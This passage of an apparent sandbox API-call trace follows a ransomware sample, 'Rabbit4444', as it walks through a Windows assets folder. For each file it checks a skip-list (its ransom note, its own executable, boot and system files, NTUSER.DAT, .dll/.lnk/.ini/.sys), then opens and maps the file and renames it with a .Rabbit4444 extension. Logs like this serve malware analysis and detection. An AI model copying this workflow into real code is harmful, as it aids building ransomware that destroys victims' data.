"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0.rabbit4444"), dwFlags=0x1) returned 1 [0071.192] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc6f4968, ftCreationTime.dwHighDateTime=0x1d32737, ftLastAccessTime.dwLowDateTime=0xdc6f4968, ftLastAccessTime.dwHighDateTime=0x1d32737, ftLastWriteTime.dwLowDateTime=0xddcf750d, ftLastWriteTime.dwHighDateTime=0x1d32737, nFileSizeHigh=0x0, nFileSizeLow=0x75b5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", cAlternateFileName="099799~1")) returned 1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="Rabbit4444.exe") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2=".") returned 1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="..") returned 1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="windows") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="bootmgr") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="pagefile.sys") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="boot") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="ids.txt") returned -1 [0071.192] lstrcmpiW (lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", lpString2="NTUSER.DAT") returned -1 [0071.192] lstrcpyW (in: lpString1=0x130ec18, lpString2="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203" | out: lpString1="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203") returned="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203" [0071.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203", dwFileAttributes=0x0) returned 1 [0071.193] lstrlenW (lpString="099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203") returned 64 [0071.193] lstrlenW (lpString="Rabbit4444") returned 10 [0071.193] lstrcmpiW (lpString1="d9fc7f0203", lpString2="Rabbit4444") returned -1 [0071.193] lstrlenW (lpString=".dll") returned 4 [0071.193] lstrcmpiW (lpString1="0203", lpString2=".dll") returned 1 [0071.193] lstrlenW (lpString=".lnk") returned 4 [0071.193] lstrcmpiW (lpString1="0203", lpString2=".lnk") returned 1 [0071.193] lstrlenW (lpString=".ini") returned 4 [0071.193] lstrcmpiW (lpString1="0203", lpString2=".ini") returned 1 [0071.193] lstrlenW (lpString=".sys") returned 4 [0071.193] lstrcmpiW (lpString1="0203", lpString2=".sys") returned 1 [0071.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.194] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.194] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16250463104) returned 1 [0071.194] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=482140) returned 1 [0071.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0071.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0071.194] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x75e60, lpName=0x0) returned 0x27c [0071.195] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e60) returned 0x2b0000 [0071.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0071.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.210] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0071.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.211] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16252149260) returned 1 [0071.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0071.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0071.211] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.215] CloseHandle (hObject=0x27c) returned 1 [0071.215] CloseHandle (hObject=0x260) returned 1 [0071.215] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203.Rabbit4444") returned 187 [0071.215] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\099799d4873c12098de4d2549b4b2b8cdced48fedc8d1d17443593d9fc7f0203.rabbit4444"), dwFlags=0x1) returned 1 [0071.216] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf26e66e6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf26e66e6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xf3796ea4, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x6244d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", cAlternateFileName="0E35FC~1")) returned 1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="Rabbit4444.exe") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2=".") returned 1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="..") returned 1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="windows") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="bootmgr") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="pagefile.sys") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="boot") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="ids.txt") returned -1 [0071.216] lstrcmpiW (lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", lpString2="NTUSER.DAT") returned -1 [0071.216] lstrcpyW (in: lpString1=0x130ec18, lpString2="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173" | out: lpString1="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173") returned="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173" [0071.217] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173", dwFileAttributes=0x0) returned 1 [0071.217] lstrlenW (lpString="0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173") returned 64 [0071.217] lstrlenW (lpString="Rabbit4444") returned 10 [0071.217] lstrcmpiW (lpString1="8f6cec6173", lpString2="Rabbit4444") returned -1 [0071.217] lstrlenW (lpString=".dll") returned 4 [0071.217] lstrcmpiW (lpString1="6173", lpString2=".dll") returned 1 [0071.217] lstrlenW (lpString=".lnk") returned 4 [0071.217] lstrcmpiW (lpString1="6173", lpString2=".lnk") returned 1 [0071.217] lstrlenW (lpString=".ini") returned 4 [0071.217] lstrcmpiW (lpString1="6173", lpString2=".ini") returned 1 [0071.217] lstrlenW (lpString=".sys") returned 4 [0071.217] lstrcmpiW (lpString1="6173", lpString2=".sys") returned 1 [0071.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.217] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.217] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16252823982) returned 1 [0071.218] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=402509) returned 1 [0071.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0071.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0071.218] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x62750, lpName=0x0) returned 0x27c [0071.219] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x62750) returned 0x2b0000 [0071.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1107c8 [0071.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1107c8 | out: hHeap=0xe0000) returned 1 [0071.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.232] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16254295948) returned 1 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0071.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0071.232] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.236] CloseHandle (hObject=0x27c) returned 1 [0071.236] CloseHandle (hObject=0x260) returned 1 [0071.236] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173.Rabbit4444") returned 187 [0071.236] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e35fc804cbae159047a0d81e392d3d398018f29dfeab84cb374498f6cec6173.rabbit4444"), dwFlags=0x1) returned 1 [0071.237] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeae672d, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xdeae672d, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdf19b25c, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x319, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", cAlternateFileName="0E7F22~1")) returned 1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="Rabbit4444.exe") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2=".") returned 1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="..") returned 1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="windows") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="bootmgr") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="pagefile.sys") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="boot") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="ids.txt") returned -1 [0071.237] lstrcmpiW (lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", lpString2="NTUSER.DAT") returned -1 [0071.237] lstrcpyW (in: lpString1=0x130ec18, lpString2="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d" | out: lpString1="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d") returned="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d" [0071.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d", dwFileAttributes=0x0) returned 1 [0071.238] lstrlenW (lpString="0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d") returned 64 [0071.238] lstrlenW (lpString="Rabbit4444") returned 10 [0071.238] lstrcmpiW (lpString1="0bb0e9215d", lpString2="Rabbit4444") returned -1 [0071.238] lstrlenW (lpString=".dll") returned 4 [0071.238] lstrcmpiW (lpString1="215d", lpString2=".dll") returned 1 [0071.238] lstrlenW (lpString=".lnk") returned 4 [0071.238] lstrcmpiW (lpString1="215d", lpString2=".lnk") returned 1 [0071.238] lstrlenW (lpString=".ini") returned 4 [0071.238] lstrcmpiW (lpString1="215d", lpString2=".ini") returned 1 [0071.238] lstrlenW (lpString=".sys") returned 4 [0071.238] lstrcmpiW (lpString1="215d", lpString2=".sys") returned 1 [0071.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.239] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.239] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16254931798) returned 1 [0071.239] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=793) returned 1 [0071.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0071.239] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x620, lpName=0x0) returned 0x27c [0071.240] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x620) returned 0x70000 [0071.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110cf0 [0071.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110cf0 | out: hHeap=0xe0000) returned 1 [0071.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0071.242] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16255303250) returned 1 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0071.242] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.242] CloseHandle (hObject=0x27c) returned 1 [0071.243] CloseHandle (hObject=0x260) returned 1 [0071.243] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d.Rabbit4444") returned 187 [0071.243] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0e7f22a57323414971b3cc9875eeeb61f67a2001f05a7cfb1429600bb0e9215d.rabbit4444"), dwFlags=0x1) returned 1 [0071.244] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8afdfc3, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb8afdfc3, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8c553ea, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4187, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", cAlternateFileName="0F7BDE~1")) returned 1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="Rabbit4444.exe") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2=".") returned 1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="..") returned 1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="windows") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="bootmgr") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="pagefile.sys") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="boot") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="ids.txt") returned -1 [0071.244] lstrcmpiW (lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", lpString2="NTUSER.DAT") returned -1 [0071.244] lstrcpyW (in: lpString1=0x130ec18, lpString2="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f" | out: lpString1="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f") returned="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f" [0071.244] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f", dwFileAttributes=0x0) returned 1 [0071.245] lstrlenW (lpString="0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f") returned 64 [0071.245] lstrlenW (lpString="Rabbit4444") returned 10 [0071.245] lstrcmpiW (lpString1="18820f640f", lpString2="Rabbit4444") returned -1 [0071.245] lstrlenW (lpString=".dll") returned 4 [0071.245] lstrcmpiW (lpString1="640f", lpString2=".dll") returned 1 [0071.245] lstrlenW (lpString=".lnk") returned 4 [0071.245] lstrcmpiW (lpString1="640f", lpString2=".lnk") returned 1 [0071.245] lstrlenW (lpString=".ini") returned 4 [0071.245] lstrcmpiW (lpString1="640f", lpString2=".ini") returned 1 [0071.245] lstrlenW (lpString=".sys") returned 4 [0071.245] 